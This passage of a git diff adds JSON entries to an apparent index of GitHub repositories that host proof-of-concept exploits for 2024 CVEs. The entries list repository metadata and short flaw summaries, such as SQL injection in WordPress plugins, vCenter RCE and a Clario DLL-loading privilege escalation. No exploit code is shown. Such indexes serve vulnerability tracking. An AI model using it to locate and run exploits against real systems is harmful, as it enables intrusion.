+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-34471.json b/2024/CVE-2024-34471.json
new file mode 100644
index 0000000000..8c78b4f88a
--- /dev/null
+++ b/2024/CVE-2024-34471.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 796114303,
+ "name": "CVE-2024-34471",
+ "full_name": "osvaldotenorio\/CVE-2024-34471",
+ "owner": {
+ "login": "osvaldotenorio",
+ "id": 45275816,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45275816?v=4",
+ "html_url": "https:\/\/github.com\/osvaldotenorio"
+ },
+ "html_url": "https:\/\/github.com\/osvaldotenorio\/CVE-2024-34471",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-05T01:10:39Z",
+ "updated_at": "2024-05-05T01:20:27Z",
+ "pushed_at": "2024-05-05T01:20:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-34472.json b/2024/CVE-2024-34472.json
new file mode 100644
index 0000000000..df9c18f874
--- /dev/null
+++ b/2024/CVE-2024-34472.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 796111814,
+ "name": "CVE-2024-34472",
+ "full_name": "osvaldotenorio\/CVE-2024-34472",
+ "owner": {
+ "login": "osvaldotenorio",
+ "id": 45275816,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45275816?v=4",
+ "html_url": "https:\/\/github.com\/osvaldotenorio"
+ },
+ "html_url": "https:\/\/github.com\/osvaldotenorio\/CVE-2024-34472",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-05T00:54:56Z",
+ "updated_at": "2024-05-05T01:09:42Z",
+ "pushed_at": "2024-05-05T01:09:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-34474.json b/2024/CVE-2024-34474.json
new file mode 100644
index 0000000000..5c76ff4f60
--- /dev/null
+++ b/2024/CVE-2024-34474.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 796157445,
+ "name": "CVE-2024-34474",
+ "full_name": "Alaatk\/CVE-2024-34474",
+ "owner": {
+ "login": "Alaatk",
+ "id": 21007805,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21007805?v=4",
+ "html_url": "https:\/\/github.com\/Alaatk"
+ },
+ "html_url": "https:\/\/github.com\/Alaatk\/CVE-2024-34474",
+ "description": " Clario through 2024-04-11 for Windows Desktop has weak permissions for %PROGRAMDATA%\\Clario and tries to load DLLs from there as SYSTEM.",
+ "fork": false,
+ "created_at": "2024-05-05T05:28:15Z",
+ "updated_at": "2024-05-05T10:01:33Z",
+ "pushed_at": "2024-05-05T05:37:13Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-34582.json b/2024/CVE-2024-34582.json
new file mode 100644
index 0000000000..e91a9372e0
--- /dev/null
+++ b/2024/CVE-2024-34582.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 801543237,
+ "name": "CVE-2024-34582",
+ "full_name": "silent6trinity\/CVE-2024-34582",
+ "owner": {
+ "login": "silent6trinity",
+ "id": 78173918,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78173918?v=4",
+ "html_url": "https:\/\/github.com\/silent6trinity"
+ },
+ "html_url": "https:\/\/github.com\/silent6trinity\/CVE-2024-34582",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-16T12:40:46Z",
+ "updated_at": "2024-05-16T12:42:44Z",
+ "pushed_at": "2024-05-16T12:42:40Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-34716.json b/2024/CVE-2024-34716.json
new file mode 100644
index 0000000000..e51fb1dbc8
--- /dev/null
+++ b/2024/CVE-2024-34716.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 800659974,
+ "name": "CVE-2024-34716_PoC",
+ "full_name": "aelmokhtar\/CVE-2024-34716_PoC",
+ "owner": {
+ "login": "aelmokhtar",
+ "id": 66908023,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66908023?v=4",
+ "html_url": "https:\/\/github.com\/aelmokhtar"
+ },
+ "html_url": "https:\/\/github.com\/aelmokhtar\/CVE-2024-34716_PoC",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-14T18:48:41Z",
+ "updated_at": "2024-05-15T18:21:48Z",
+ "pushed_at": "2024-05-15T18:21:45Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-34832.json b/2024/CVE-2024-34832.json
new file mode 100644
index 0000000000..41e7418408
--- /dev/null
+++ b/2024/CVE-2024-34832.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 800669988,
+ "name": "CVE-2024-34832",
+ "full_name": "julio-cfa\/CVE-2024-34832",
+ "owner": {
+ "login": "julio-cfa",
+ "id": 52619625,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52619625?v=4",
+ "html_url": "https:\/\/github.com\/julio-cfa"
+ },
+ "html_url": "https:\/\/github.com\/julio-cfa\/CVE-2024-34832",
+ "description": "CVE-2024-34832",
+ "fork": false,
+ "created_at": "2024-05-14T19:15:31Z",
+ "updated_at": "2024-06-03T10:42:47Z",
+ "pushed_at": "2024-06-03T10:42:44Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-3495.json b/2024/CVE-2024-3495.json
new file mode 100644
index 0000000000..2ffb08a2ed
--- /dev/null
+++ b/2024/CVE-2024-3495.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 804659512,
+ "name": "CVE-2024-3495-Poc",
+ "full_name": "truonghuuphuc\/CVE-2024-3495-Poc",
+ "owner": {
+ "login": "truonghuuphuc",
+ "id": 20487674,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4",
+ "html_url": "https:\/\/github.com\/truonghuuphuc"
+ },
+ "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-3495-Poc",
+ "description": "CVE-2024-3495 Country State City Dropdown CF7 <= 2.7.2 - Unauthenticated SQL Injection",
+ "fork": false,
+ "created_at": "2024-05-23T02:41:15Z",
+ "updated_at": "2024-05-27T11:12:36Z",
+ "pushed_at": "2024-05-24T15:27:43Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 806847761,
+ "name": "CVE-2024-3495-POC",
+ "full_name": "zomasec\/CVE-2024-3495-POC",
+ "owner": {
+ "login": "zomasec",
+ "id": 118324667,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118324667?v=4",
+ "html_url": "https:\/\/github.com\/zomasec"
+ },
+ "html_url": "https:\/\/github.com\/zomasec\/CVE-2024-3495-POC",
+ "description": "The Country State City Dropdown CF7 WordPress plugin (versions up to 2.7.2) is vulnerable to SQL Injection via 'cnt' and 'sid' parameters. Insufficient escaping and lack of preparation in the SQL query allow unauthenticated attackers to append queries, potentially extracting sensitive database information.",
+ "fork": false,
+ "created_at": "2024-05-28T02:57:12Z",
+ "updated_at": "2024-05-28T02:57:16Z",
+ "pushed_at": "2024-05-28T02:57:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-34958.json b/2024/CVE-2024-34958.json
new file mode 100644
index 0000000000..3b03ba923a
--- /dev/null
+++ b/2024/CVE-2024-34958.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 803178565,
+ "name": "CVE-2024-34958",
+ "full_name": "Gr-1m\/CVE-2024-34958",
+ "owner": {
+ "login": "Gr-1m",
+ "id": 57427356,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57427356?v=4",
+ "html_url": "https:\/\/github.com\/Gr-1m"
+ },
+ "html_url": "https:\/\/github.com\/Gr-1m\/CVE-2024-34958",
+ "description": "idccms CSRF poc",
+ "fork": false,
+ "created_at": "2024-05-20T08:15:05Z",
+ "updated_at": "2024-06-03T04:59:09Z",
+ "pushed_at": "2024-06-03T04:59:06Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-35315.json b/2024/CVE-2024-35315.json
new file mode 100644
index 0000000000..85531ba752
--- /dev/null
+++ b/2024/CVE-2024-35315.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 809831418,
+ "name": "CVE-2024-35315-POC",
+ "full_name": "ewilded\/CVE-2024-35315-POC",
+ "owner": {
+ "login": "ewilded",
+ "id": 1158719,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1158719?v=4",
+ "html_url": "https:\/\/github.com\/ewilded"
+ },
+ "html_url": "https:\/\/github.com\/ewilded\/CVE-2024-35315-POC",
+ "description": "Mitel Collab Local Privilege Escalation CVE-2024-35315 PoC",
+ "fork": false,
+ "created_at": "2024-06-03T14:29:35Z",
+ "updated_at": "2024-06-03T14:31:39Z",
+ "pushed_at": "2024-06-03T14:31:35Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-35333.json b/2024/CVE-2024-35333.json
new file mode 100644
index 0000000000..5504ab44dc
--- /dev/null
+++ b/2024/CVE-2024-35333.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 800500812,
+ "name": "CVE-2024-35333",
+ "full_name": "momo1239\/CVE-2024-35333",
+ "owner": {
+ "login": "momo1239",
+ "id": 34490185,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34490185?v=4",
+ "html_url": "https:\/\/github.com\/momo1239"
+ },
+ "html_url": "https:\/\/github.com\/momo1239\/CVE-2024-35333",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-14T13:02:36Z",
+ "updated_at": "2024-05-28T17:36:58Z",
+ "pushed_at": "2024-05-28T17:36:01Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-35468.json b/2024/CVE-2024-35468.json
new file mode 100644
index 0000000000..23db8b2d87
--- /dev/null
+++ b/2024/CVE-2024-35468.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 799070356,
+ "name": "CVE-2024-35468",
+ "full_name": "dovankha\/CVE-2024-35468",
+ "owner": {
+ "login": "dovankha",
+ "id": 63991630,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63991630?v=4",
+ "html_url": "https:\/\/github.com\/dovankha"
+ },
+ "html_url": "https:\/\/github.com\/dovankha\/CVE-2024-35468",
+ "description": "CVE-2024-35468 | SQL injection",
+ "fork": false,
+ "created_at": "2024-05-11T05:23:41Z",
+ "updated_at": "2024-05-30T04:14:44Z",
+ "pushed_at": "2024-05-30T03:55:11Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-35469.json b/2024/CVE-2024-35469.json
new file mode 100644
index 0000000000..5c952d8ac4
--- /dev/null
+++ b/2024/CVE-2024-35469.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 799102410,
+ "name": "CVE-2024-35469",
+ "full_name": "dovankha\/CVE-2024-35469",
+ "owner": {
+ "login": "dovankha",
+ "id": 63991630,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63991630?v=4",
+ "html_url": "https:\/\/github.com\/dovankha"
+ },
+ "html_url": "https:\/\/github.com\/dovankha\/CVE-2024-35469",
+ "description": "CVE-2024-35469 | SQL injection",
+ "fork": false,
+ "created_at": "2024-05-11T07:27:31Z",
+ "updated_at": "2024-05-31T02:59:54Z",
+ "pushed_at": "2024-05-30T03:59:15Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-35475.json b/2024/CVE-2024-35475.json
new file mode 100644
index 0000000000..cad9b4277f
--- /dev/null
+++ b/2024/CVE-2024-35475.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 804405352,
+ "name": "CVE-2024-35475",
+ "full_name": "carsonchan12345\/CVE-2024-35475",
+ "owner": {
+ "login": "carsonchan12345",
+ "id": 44266907,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44266907?v=4",
+ "html_url": "https:\/\/github.com\/carsonchan12345"
+ },
+ "html_url": "https:\/\/github.com\/carsonchan12345\/CVE-2024-35475",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-22T14:21:48Z",
+ "updated_at": "2024-05-22T14:23:45Z",
+ "pushed_at": "2024-05-22T14:23:41Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-35511.json b/2024/CVE-2024-35511.json
new file mode 100644
index 0000000000..3269268b3a
--- /dev/null
+++ b/2024/CVE-2024-35511.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 805787755,
+ "name": "CVE-2024-35511",
+ "full_name": "efekaanakkar\/CVE-2024-35511",
+ "owner": {
+ "login": "efekaanakkar",
+ "id": 130908672,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130908672?v=4",
+ "html_url": "https:\/\/github.com\/efekaanakkar"
+ },
+ "html_url": "https:\/\/github.com\/efekaanakkar\/CVE-2024-35511",
+ "description": "Men Salon Management System Using PHP and MySQL",
+ "fork": false,
+ "created_at": "2024-05-25T13:07:35Z",
+ "updated_at": "2024-05-25T22:53:35Z",
+ "pushed_at": "2024-05-25T22:44:37Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-3552.json b/2024/CVE-2024-3552.json
new file mode 100644
index 0000000000..bf224dffd5
--- /dev/null
+++ b/2024/CVE-2024-3552.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 806641901,
+ "name": "CVE-2024-3552-Poc",
+ "full_name": "truonghuuphuc\/CVE-2024-3552-Poc",
+ "owner": {
+ "login": "truonghuuphuc",
+ "id": 20487674,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4",
+ "html_url": "https:\/\/github.com\/truonghuuphuc"
+ },
+ "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-3552-Poc",
+ "description": "CVE-2024-3552 Web Directory Free <= 1.6.9 - Unauthenticated SQL Injection",
+ "fork": false,
+ "created_at": "2024-05-27T15:36:24Z",
+ "updated_at": "2024-05-28T10:25:59Z",
+ "pushed_at": "2024-05-28T10:25:55Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-36079.json b/2024/CVE-2024-36079.json
new file mode 100644
index 0000000000..c5391c8c54
--- /dev/null
+++ b/2024/CVE-2024-36079.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 803520695,
+ "name": "vaultize_CVE-2024-36079",
+ "full_name": "DxRvs\/vaultize_CVE-2024-36079",
+ "owner": {
+ "login": "DxRvs",
+ "id": 65038265,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65038265?v=4",
+ "html_url": "https:\/\/github.com\/DxRvs"
+ },
+ "html_url": "https:\/\/github.com\/DxRvs\/vaultize_CVE-2024-36079",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-20T22:07:41Z",
+ "updated_at": "2024-05-24T17:11:40Z",
+ "pushed_at": "2024-05-24T17:11:37Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-36104.json b/2024/CVE-2024-36104.json
new file mode 100644
index 0000000000..dd01cd876d
--- /dev/null
+++ b/2024/CVE-2024-36104.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 816184138,
+ "name": "CVE-2024-36104",
+ "full_name": "ggfzx\/CVE-2024-36104",
+ "owner": {
+ "login": "ggfzx",
+ "id": 86279656,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86279656?v=4",
+ "html_url": "https:\/\/github.com\/ggfzx"
+ },
+ "html_url": "https:\/\/github.com\/ggfzx\/CVE-2024-36104",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-17T07:57:58Z",
+ "updated_at": "2024-06-18T05:59:22Z",
+ "pushed_at": "2024-06-17T08:01:57Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-36416.json b/2024/CVE-2024-36416.json
new file mode 100644
index 0000000000..beb5b2b33a
--- /dev/null
+++ b/2024/CVE-2024-36416.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 812538216,
+ "name": "CVE-2024-36416",
+ "full_name": "kva55\/CVE-2024-36416",
+ "owner": {
+ "login": "kva55",
+ "id": 60018788,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60018788?v=4",
+ "html_url": "https:\/\/github.com\/kva55"
+ },
+ "html_url": "https:\/\/github.com\/kva55\/CVE-2024-36416",
+ "description": "Tool for validating \/ testing CVE-2024-36416",
+ "fork": false,
+ "created_at": "2024-06-09T07:18:54Z",
+ "updated_at": "2024-06-15T05:26:59Z",
+ "pushed_at": "2024-06-15T05:26:57Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-36527.json b/2024/CVE-2024-36527.json
new file mode 100644
index 0000000000..04a4f55803
--- /dev/null
+++ b/2024/CVE-2024-36527.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 817716170,
+ "name": "CVE-2024-36527",
+ "full_name": "bigb0x\/CVE-2024-36527",
+ "owner": {
+ "login": "bigb0x",
+ "id": 13532434,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4",
+ "html_url": "https:\/\/github.com\/bigb0x"
+ },
+ "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-36527",
+ "description": "POC for CVE-2024-36527: puppeteer-renderer v.3.2.0 and before is vulnerable to Directory Traversal",
+ "fork": false,
+ "created_at": "2024-06-20T09:42:07Z",
+ "updated_at": "2024-06-22T00:50:37Z",
+ "pushed_at": "2024-06-22T00:50:33Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-36821.json b/2024/CVE-2024-36821.json
new file mode 100644
index 0000000000..065dd68f26
--- /dev/null
+++ b/2024/CVE-2024-36821.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 813172649,
+ "name": "CVE-2024-36821",
+ "full_name": "IvanGlinkin\/CVE-2024-36821",
+ "owner": {
+ "login": "IvanGlinkin",
+ "id": 64857726,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64857726?v=4",
+ "html_url": "https:\/\/github.com\/IvanGlinkin"
+ },
+ "html_url": "https:\/\/github.com\/IvanGlinkin\/CVE-2024-36821",
+ "description": "The public reference that contains the minimum require information for the vulnerability covered by CVE-2024-36821",
+ "fork": false,
+ "created_at": "2024-06-10T15:52:02Z",
+ "updated_at": "2024-06-17T09:07:29Z",
+ "pushed_at": "2024-06-10T16:07:40Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-36837.json b/2024/CVE-2024-36837.json
new file mode 100644
index 0000000000..fc6c0442ae
--- /dev/null
+++ b/2024/CVE-2024-36837.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 815626615,
+ "name": "CVE-2024-36837",
+ "full_name": "phtcloud-dev\/CVE-2024-36837",
+ "owner": {
+ "login": "phtcloud-dev",
+ "id": 151622760,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151622760?v=4",
+ "html_url": "https:\/\/github.com\/phtcloud-dev"
+ },
+ "html_url": "https:\/\/github.com\/phtcloud-dev\/CVE-2024-36837",
+ "description": "CVE-2024-36837 POC",
+ "fork": false,
+ "created_at": "2024-06-15T16:44:51Z",
+ "updated_at": "2024-06-17T09:22:39Z",
+ "pushed_at": "2024-06-15T17:34:43Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-37051.json b/2024/CVE-2024-37051.json
new file mode 100644
index 0000000000..264e5de8c7
--- /dev/null
+++ b/2024/CVE-2024-37051.json
@@ -0,0 +1,66 @@
+[
+ {
+ "id": 813723501,
+ "name": "CVE-2024-37051-EXP",
+ "full_name": "LeadroyaL\/CVE-2024-37051-EXP",
+ "owner": {
+ "login": "LeadroyaL",
+ "id": 9478918,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9478918?v=4",
+ "html_url": "https:\/\/github.com\/LeadroyaL"
+ },
+ "html_url": "https:\/\/github.com\/LeadroyaL\/CVE-2024-37051-EXP",
+ "description": "CVE-2024-37051 poc and exploit",
+ "fork": false,
+ "created_at": "2024-06-11T16:01:13Z",
+ "updated_at": "2024-06-25T11:39:38Z",
+ "pushed_at": "2024-06-11T19:02:40Z",
+ "stargazers_count": 26,
+ "watchers_count": 26,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2024-37051",
+ "exploit",
+ "payload"
+ ],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 26,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 814572729,
+ "name": "CVE-2024-37051",
+ "full_name": "mrblackstar26\/CVE-2024-37051",
+ "owner": {
+ "login": "mrblackstar26",
+ "id": 93428115,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93428115?v=4",
+ "html_url": "https:\/\/github.com\/mrblackstar26"
+ },
+ "html_url": "https:\/\/github.com\/mrblackstar26\/CVE-2024-37051",
+ "description": "Users of JetBrains IDEs at risk of GitHub access token compromise (CVE-2024-37051)",
+ "fork": false,
+ "created_at": "2024-06-13T09:15:58Z",
+ "updated_at": "2024-06-13T09:22:33Z",
+ "pushed_at": "2024-06-13T09:22:30Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-37079.json b/2024/CVE-2024-37079.json
new file mode 100644
index 0000000000..0f8b2c7bfe
--- /dev/null
+++ b/2024/CVE-2024-37079.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 817552301,
+ "name": "CVE-2024-37079-RCE-POC",
+ "full_name": "v3rce\/CVE-2024-37079-RCE-POC",
+ "owner": {
+ "login": "v3rce",
+ "id": 173321874,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/173321874?v=4",
+ "html_url": "https:\/\/github.com\/v3rce"
+ },
+ "html_url": "https:\/\/github.com\/v3rce\/CVE-2024-37079-RCE-POC",
+ "description": "PoC for CVE-2024-37079 Vcenter server unauthenticated RCE.",
+ "fork": false,
+ "created_at": "2024-06-20T01:09:20Z",
+ "updated_at": "2024-06-20T01:10:29Z",
+ "pushed_at": "2024-06-20T01:10:26Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-37393.json b/2024/CVE-2024-37393.json
new file mode 100644
index 0000000000..55da71a5ec
--- /dev/null
+++ b/2024/CVE-2024-37393.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 813073392,
+ "name": "securenvoy-cve-2024-37393",
